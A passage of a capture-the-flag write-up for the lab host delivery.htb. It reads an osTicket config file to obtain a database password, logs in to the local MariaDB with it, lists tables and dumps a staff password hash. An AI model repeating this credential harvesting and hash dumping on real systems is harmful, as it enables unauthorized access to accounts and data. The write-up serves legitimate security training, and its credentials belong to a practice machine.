osTicket
After making some basic enumeration, I decided to check for the installation directory of the osTicket instance
maildeliverer@delivery:/var/www/osticket/upload$ ls
account.php assets client.inc.php include login.php manage.php profile.php tickets.php
ajax.php avatar.php css index.php logo.php offline.php pwreset.php view.php
api bootstrap.php file.php js logout.php open.php scp web.config
apps captcha.php images kb main.inc.php pages secure.inc.phpIt’s located at the /var/www/osticket/upload directory
maildeliverer@delivery:/var/www/osticket/upload/include$ sed '/^#/d' ost-config.php
<?php
/*********************************************************************
ost-config.php
Static osTicket configuration file. Mainly useful for mysql login info.
Created during installation process and shouldn't change even on upgrades.
Peter Rotich <peter@osticket.com>
Copyright (c) 2006-2010 osTicket
http://www.osticket.com
Released under the GNU General Public License WITHOUT ANY WARRANTY.
See LICENSE.TXT for details.
vim: expandtab sw=4 ts=4 sts=4:
$id: $
**********************************************************************/
if(!strcasecmp(basename($_SERVER['SCRIPT_NAME']),basename(__FILE__)) || !defined('INCLUDE_DIR'))
die('kwaheri rafiki!');
define('OSTINSTALLED',TRUE);
if(OSTINSTALLED!=TRUE){
if(!file_exists(root_dir.'setup/install.php')) die('error: Contact system admin.'); //Something is really wrong!
//Invoke the installer.
header('location: '.ROOT_PATH.'setup/install.php');
exit;
}
define('SECRET_SALT','nP8uygzdkzXRLJzYUmdmLDEqDSq5bGk3');
define('ADMIN_EMAIL','maildeliverer@delivery.htb');
define('DBTYPE','mysql');
define('DBHOST','localhost');
define('DBNAME','osticket');
define('DBUSER','ost_user');
define('DBPASS','!H3lpD3sk123!');
define('TABLE_PREFIX','ost_');
define('TRUSTED_PROXIES', '');
define('LOCAL_NETWORKS', '127.0.0.0/24');
?>I found a file containing a DB credential; include/ost-config.php
the db credential is ost_user:!H3lpD3sk123!
Local DB
maildeliverer@Delivery:/var/www/osticket/upload$ mysql -u ost_user -p'!H3lpD3sk123!'
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 247
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> I was able to authenticate to the local mysqld service, using the
DB
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| osticket |
+--------------------+
2 rows in set (0.001 sec)
MariaDB [(none)]> use osticket;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changedChecking the osticket DB
Tables
MariaDB [osticket]> show tables;
+--------------------------+
| Tables_in_osticket |
+--------------------------+
| ost__search |
| ost_api_key |
| ost_attachment |
| ost_canned_response |
| ost_config |
| ost_content |
| ost_department |
| ost_draft |
| ost_email |
| ost_email_account |
| ost_email_template |
| ost_email_template_group |
| ost_event |
| ost_faq |
| ost_faq_category |
| ost_faq_topic |
| ost_file |
| ost_file_chunk |
| ost_filter |
| ost_filter_action |
| ost_filter_rule |
| ost_form |
| ost_form_entry |
| ost_form_entry_values |
| ost_form_field |
| ost_group |
| ost_help_topic |
| ost_help_topic_form |
| ost_list |
| ost_list_items |
| ost_lock |
| ost_note |
| ost_organization |
| ost_plugin |
| ost_queue |
| ost_queue_column |
| ost_queue_columns |
| ost_queue_config |
| ost_queue_export |
| ost_queue_sort |
| ost_queue_sorts |
| ost_role |
| ost_schedule |
| ost_schedule_entry |
| ost_sequence |
| ost_session |
| ost_sla |
| ost_staff |
| ost_staff_dept_access |
| ost_syslog |
| ost_task |
| ost_task__cdata |
| ost_team |
| ost_team_member |
| ost_thread |
| ost_thread_collaborator |
| ost_thread_entry |
| ost_thread_entry_email |
| ost_thread_entry_merge |
| ost_thread_event |
| ost_thread_referral |
| ost_ticket |
| ost_ticket__cdata |
| ost_ticket_priority |
| ost_ticket_status |
| ost_translation |
| ost_user |
| ost_user__cdata |
| ost_user_account |
| ost_user_email |
+--------------------------+
70 rows in set (0.001 sec)While there are 70 tables, I will check only those that are relevant to credentials
osticket.ost_staff
MariaDB [osticket]> SELECT username,passwd FROM ost_staff;
+---------------+--------------------------------------------------------------+
| username | passwd |
+---------------+--------------------------------------------------------------+
| maildeliverer | $2a$08$VlccTgoFaxEaGJnZtWwJBOf2EqMW5L1ZLA72QoQN/TrrOJt9mFGcy |
+---------------+--------------------------------------------------------------+
1 row in set (0.001 sec)The maildeliverer user is the only staff
It’s likely using the same passwd
I can authenticate to the admin GUI panel, but there seems to be nothing useful.
It seems to be the deadend here